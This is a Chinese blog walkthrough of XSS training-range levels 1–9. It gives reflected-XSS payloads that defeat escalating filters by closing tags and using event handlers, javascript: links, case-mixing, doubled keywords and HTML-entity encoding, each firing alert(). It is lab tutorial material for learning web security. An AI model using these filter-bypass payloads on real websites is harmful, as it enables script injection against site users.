【xss靶场1-9】见框就插:闭合、过滤、编码、触发事件、http头、标签

最新推荐文章于 2024-03-23 16:00:21 发布
最新推荐文章于 2024-03-23 16:00:21 发布
阅读量1.2k 收藏 6
点赞数 2
分类专栏: # 【全】xss靶场 文章标签: web安全 前端 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125829545
版权

目录

一、推荐

Less1(无过滤)

特点:

利用:

Less2(闭合标签)

特点:

利用:

Less3('闭合+触发事件)

特点:

利用:

Less4(<>被过滤+"闭合+触发事件)

特点:

利用:

Less5(构造链接+"/>闭合)

特点:

利用:

Less6(构造链接+"/>闭合+大小写混淆绕过)

特点:

利用:

Less7(构造链接+"/>闭合+关键字过滤+双写混淆绕过)

特点:

利用:

Less8(编码绕过+关键字过滤)

特点:

利用:

 Less9(编码绕过+关键字过滤+http头)

特点:

利用:

一、推荐

【XSS跨站合集】反射型、存储型、DOM类XSS原理;输出在HTML、CSS、Javascript代码中icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/123694180?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165802668016781818737899%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165802668016781818737899&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-4-123694180-null-null.185^v2^control&utm_term=xss&spm=1018.2226.3001.4450

Less1(无过滤)

特点:

参数中插入

无过滤

反射性

利用:

见空就插,看见有参数,插

<script>alert()</script>

 

Less2(闭合标签)

特点:

参数中插入

被HTMLL编码了

反射性

利用:

见空就插,看见有参数,插

<script>alert()</script>

右键查看源码

可以看到我们输入的内容被HTML实体编码了

扩展:

HTML实体编码,格式 以&符号开头,以;分号结尾

十进制的ASCLL编码,格式: 以符号&#开头,分号;结尾

 

打开开发者模式(Ctrl+shift+I)

定位到输入框位置

可以看见是在value标签框里

 

尝试闭合标签

"><script>alert(/xss/)</script>

可以在URL中输入,也可以再搜索框中输入

 

 

Less3('闭合+触发事件)

特点:

参数中插入

被HTMLL编码了

单引号闭合

反射性

利用:

见空就插,看见有参数,插

<script>alert()</script>

 

右键查看源码

可以看到我们输入的内容被HTML实体编码了

扩展:

HTML实体编码,格式 以&符号开头,以;分号结尾

十进制的ASCLL编码,格式: 以符号&#开头,分号;结尾

 

打开开发者模式(Ctrl+shift+I)

定位到输入框位置

可以看见是在value标签框里

 

尝试闭合标签

"><script>alert(/xss/)</script>

从搜索框中输入

发现已经没效果了

 

 前后出现了单引号,考虑单引号闭合他们

 

尝试使用触发事件函数来弹窗

扩展:

onclick(点击)

onerror(加载外部文件(文档、图像)发生错误时触发)

onmouseover(鼠标滑过)

……

'οnclick='alert()

 然后再点击一下输入框

 

Less4(<>被过滤+"闭合+触发事件)

特点:

参数中插入

被HTMLL编码了

<>被过滤为空了

双引号闭合

反射性

利用:

见空就插,看见有参数,插

<script>alert()</script>

 

右键查看源码

发现<>都变没了,变成了空的

 

打开开发者模式(Ctrl+shift+I)

定位到输入框位置

可以看见是在value标签框里,还是首先考虑闭合

 

使用"><script>alert(/xss/)</script>已经无效了

因为<>都被过滤了

尝试使用触发事件函数来弹窗

扩展:

onclick(点击)

onerror(加载外部文件(文档、图像)发生错误时触发)

onmouseover(鼠标滑过)

……

" οnmοuseοver='alert()'

 然后移动鼠标

 

 

Less5(构造链接+"/>闭合)

特点:

参数中插入

特殊标签都被加上了下划线

")闭合

反射性

利用:

见空就插,看见有参数,插

<script>alert()</script>​​​​​​​

 

右键查看源码

发现标签被加了下划线

 

打开开发者模式(Ctrl+shift+I)

定位到输入框位置

可以看见是在value标签框里,还是考虑绕过,或者闭合

 

测试能否双写绕过

使用<scrscriipt>alert()</script>

行不通

尝试使用触发事件函数来弹窗

扩展:

onclick(点击)

onerror(加载外部文件(文档、图像)发生错误时触发)

onmouseover(鼠标滑过)

……

都被加上了下划线

 尝试

javascript

可行

通过闭合前面的value,在后面构造一个链接

点击触发弹窗

payload:" /> <a href=javascript:alert()>链接</a>

 <input name=keyword value=""> <a href=javascript:alert()>something</a>">

 

 

Less6(构造链接+"/>闭合+大小写混淆绕过)

特点:

参数中插入

特殊标签都被加上了下划线

">闭合

构造链接

大小写绕过

反射性

利用:

见空就插,看见有参数,插

<script>alert()</script>

 

右键查看源码

发现标签被加了下划线

 打开开发者模式(Ctrl+shift+I) 

定位到输入框位置

可以看见是在value标签框里,还是考虑绕过,或者闭合

尝试使用触发事件函数来弹窗

扩展:

onclick(点击)

onerror(加载外部文件(文档、图像)发生错误时触发)

onmouseover(鼠标滑过)

……

都被加上了下划线

 

 尝试

javascript

可行

 

通过闭合前面的value,在后面构造一个链接

点击触发弹窗

payload:" /> <a href=javascript:alert()>链接</a>

 <input name=keyword value=""> <a href=javascript:alert()>something</a>">

发现链接点不了

查看后发现是href被加了下划线

 

考虑绕过

考虑大小写绕过,或者双写绕过

" /> <a hRef=javascript:alert()>链接</a>

未被过滤了

 

Less7(构造链接+"/>闭合+关键字过滤+双写混淆绕过)

特点:

参数中插入

首先被全部转换为小写,然后关键字被过滤

">闭合

构造链接

双写绕过

反射性

利用:

见空就插,看见有参数,插

<script>alert()</script>

 

右键查看源码

发现标签被过滤了

尝试使用触发事件函数来弹窗

扩展:

onclick(点击)

onerror(加载外部文件(文档、图像)发生错误时触发)

onmouseover(鼠标滑过)

……

发现也被过滤了

 尝试

javascript

发现也被过滤了

 

考虑绕过过滤

考虑大小写绕过,或者双写绕过

" /> <a hRef=JavaScript:alert()>链接</a>

发现全部被转换为了小写,且被过滤了

 "> <a hrhrefef='javascriscriptpt:alert()'>链接</a>

 

或者直接弹窗

"><scrscriptipt>alert()</scrscriptipt>

 

Less8(编码绕过+关键字过滤)

特点:

参数中插入

首先被全部转换为小写,然后关键字被过滤

编码绕过

反射性

利用:

见空就插,看见有参数,插

<script>alert()</script>

右键查看源码

发现关键字被加了下划线

 

 尝试

javascript

发现也被加了下划线

考虑绕过过滤

考虑大小写绕过,或者双写绕过

javascript:alert()

被进行了编码,和过滤

尝试进行HTML编码绕过

可以选择局部字符编码,也可以全部编码绕过

 

 

就变成了

javascri&#112;&#116;:alert()

 

全部编码就是

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

 

 

 Less9(编码绕过+关键字过滤+http头)

特点:

参数中插入

首先被全部转换为小写,然后关键字被过滤

编码绕过

添加http头

反射性

利用:

见空就插,看见有参数,插

<script>alert()</script>

提示不合法

http://<script>alert()</script>

添加链接后,点击无效果

 右键查看源码

关键字是被加上了下划线

 

尝试进行HTML编码绕过

可以选择局部字符编码,也可以全部编码绕过

http://javascript:alert()

就变成了

javascri&#112;&#116;:alert()//http://

 

全部编码就是

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;//http://

 

 ​​​​​​

 

黑色地带(崛起)
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
XSS测试之闭合的正确使用方式
u014171100的博客
12-16 5175
在测试XSS漏洞的时,不少同鞋会从大量Payload中随便挑选几个顺眼来尝试,没有弹窗就放弃了,这种方法并不是很科学,一些稍微隐秘点的XSS基本都能逃过这样的检查。下面我将从XSS的本质讲起,给各位分享一下我的XSS测试方法。 XSS属于注入类漏洞,其本质是:在前端代码中用户可以控制内容的地方(简称可控点),拼接上一段可被浏览器执行的新语句。这里可被浏览器执行是关键,不管你正在测试的点是否有漏洞,首先拼接上去的脚本同上下文看来,需要一定程度的符合前端代码的语法结构。 ...
xss闭合标签用法
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
11-05 465
div1
XSS漏洞
qq_46429177的博客
01-15 582
XSS漏洞介绍和分类 介绍 跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击! XSS分类 反射型(非持久型): 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发漏洞。 存储型(持久型):
Pikachu靶场-xss详解
qq_53083285的博客
10-30 7491
Picachu靶场-xss跨站脚本漏洞概述跨站脚本漏洞类型及测试流程反射型XSS(post&get)存储型XSSDom型XSSxss-获取cookiexss-进行钓鱼xss-获取键盘记录xss盲打xss过滤和绕过xss输出在href和js中的案例xss的防范措施 XSS-跨站脚本漏洞目录 跨站脚本漏洞概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS;
WEB攻防-XSS跨站&反射型&存储型&DOM型&标签闭合&输入输出&JS代码解析
siu~
09-08 234
1、XSS跨站-输入输出-原理&分类&闭合 2、XSS跨站-分类测试-反射&存储&DOM
xss-labs-master.zip(xss注入通关游戏/靶场
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
XSS-SQL-Master-Payloads:我的有效载荷集合(XSS,SQL ...)
05-01
XSS-SQL-Master-Payloads:我的有效载荷集合》 在网络安全领域,XSS(跨站脚本攻击)和SQL注入是两种常见的攻击手段,它们对网站的安全构成严重威胁。有效的payload(有效载荷)是这些攻击的关键组成部分,能够...
xss-payload-list::bullseye:跨站点脚本(XSS)漏洞有效负载列表
05-22
当攻击者使用Web应用程序将恶意代码(通常以浏览器脚本的形式)发送给其他最终用户时,就会发生XSS攻击。 使得这些攻击成功的缺陷非常普遍,并且在Web应用程序使用其生成的输出中未经验证或编码的情况下使用来自...
xss-cleaner-filter-laravel:这个包添加了一个额外的过滤器来防止 xss 攻击
06-22
" ali-sharifi/xss-cleaner-filter " : " dev-master " 然后在您的项目根目录中运行: composer update 然后,在config/app.php服务提供者的数组中包含以下内容: 'AliSharifi\XssCleanerFilter\...
XSS绕过技巧总结
weixin_51802382的博客
10-22 2316
XSS绕过技巧 作者:白泽Sec安全实验室 前言 XSSWeb应用程序中常见的漏洞之一,网站管理员可以通过用户输入过滤、根据上下文转换输出数据、正确使用DOM、强制执行跨源资源共享(CORS)策略以及其他的安全策略来规避XSS漏洞。尽管现在有很多预防XSS攻击的技术,但Web应用程序防火墙(WAF)或自定义数据过滤器是目前使用比较广泛的安全保护技术了,很多厂商都会利用这些技术来抵御新型的XSS攻击向量 有些时候,通用的绕过技巧并不可行,这个时候我们就得观察缺陷点的周围环境,想想其它办法咯。“猥琐绕过”与通
XSS————3、XSS测试思路
Fly_鹏程万里
12-13 1128
0x00前言 作为一个刚入行的菜鸟,之前对XSS测试的思路没有一个具体化的总结 今天下午写了一下关于测试XSS渗透测试过程的总结 希望大家能在底下写上自己常用的和好用的payload 谢谢!!! 0x01 关于闭合前方标签 首先自然是测试如何闭合前面的标签来成功入自己的XSS代码,下面给出了几种常用的闭合 1. ’&gt;  ‘&gt;  “&gt;   “/&gt;   ‘&gt...
XSS-labs详解
最新发布
ytdd66的博客
03-23 2030
进入靶场点击图片,开始我们的XSS之旅!
sqli-labs靶场Less-1极其详细练习过程
qq_51782199的博客
03-09 446
代表URL地址的结尾与数据参数的开端,后面的参数每一个数据参数以“名称=值”的形式出现,参数与参数之间利用一个连接符&来区分。id=1.3或者随便等于一个不存在的,id=99999或者id=-1等,这样做的目的是为了不显示前面所查询的内容,显示后面的内容。0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。order by 10 对要查询表的第10个字段(第10列)进行排序(升序),用于判断字段数(报错即为没有那么多字段)。
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
热门推荐
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss是攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
xss攻击-面向前端安全攻击 ─=≡Σ(((つ•̀ω•́)つ 知己知彼百战百胜 >web安全<
寻觅的博客
02-28 1315
文章目录
XSS原理分析与解剖及反射型XSS
qq_68233961的博客
08-21 523
XSS原理分析与解剖及反射型XSS
XSS大全
weixin_46601374的博客
03-01 8233
XSS的原理和特性 xss:将用户的输入当作前端代码执行 注入攻击的本质,是把用户输入的数据当做代码执行。 这里有两个关键条件: 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据 html:定义了网页的结构 css:美化页面 js:可以操浏览器 XSS主要拼接的是什么 SQL注入拼接的是操作数据库的SQL语句。 XSS拼接的是网页的HTML代码,一般而言我们是可以拼接出合适的HTML代码去执行恶意的JS语句(总结:xss就是拼接恶意的HTML) xss
leaflet实现动态绘制多边形,绘制完毕后双击闭合多边形
06-06
你可以使用Leaflet.draw件来实现动态绘制多边形,并且可以使用双击事件来闭合多边形。下面是一个基本的实现示例: 1. 首先,在页面中引入Leaflet和Leaflet.draw件的JS和CSS文件: ```html <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/leaflet/1.7.1/leaflet.css" /> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/leaflet.draw/1.0.4/leaflet.draw.css" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/leaflet/1.7.1/leaflet.js"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/leaflet.draw/1.0.4/leaflet.draw.js"></script> ``` 2. 创建一个Leaflet地图: ```javascript var map = L.map('map').setView([51.505, -0.09], 13); L.tileLayer('https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png', { attribution: 'Map data © <a href="https://www.openstreetmap.org/">OpenStreetMap</a> contributors', maxZoom: 18 }).addTo(map); ``` 3. 添加绘图控件: ```javascript var drawnItems = new L.FeatureGroup(); map.addLayer(drawnItems); var drawControl = new L.Control.Draw({ edit: { featureGroup: drawnItems }, draw: { polygon: true, polyline: false, rectangle: false, circle: false, marker: false } }); map.addControl(drawControl); ``` 4. 监听多边形绘制完成事件,并添加双击事件来闭合多边形: ```javascript map.on('draw:created', function(e) { var layer = e.layer; layer.on('dblclick', function() { if (layer instanceof L.Polygon) { layer.addLatLng(layer.getLatLngs()[0]); } }); drawnItems.addLayer(layer); }); ``` 这样,当用户完成绘制多边形后,双击多边形的任意一个点就可以将多边形闭合了。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值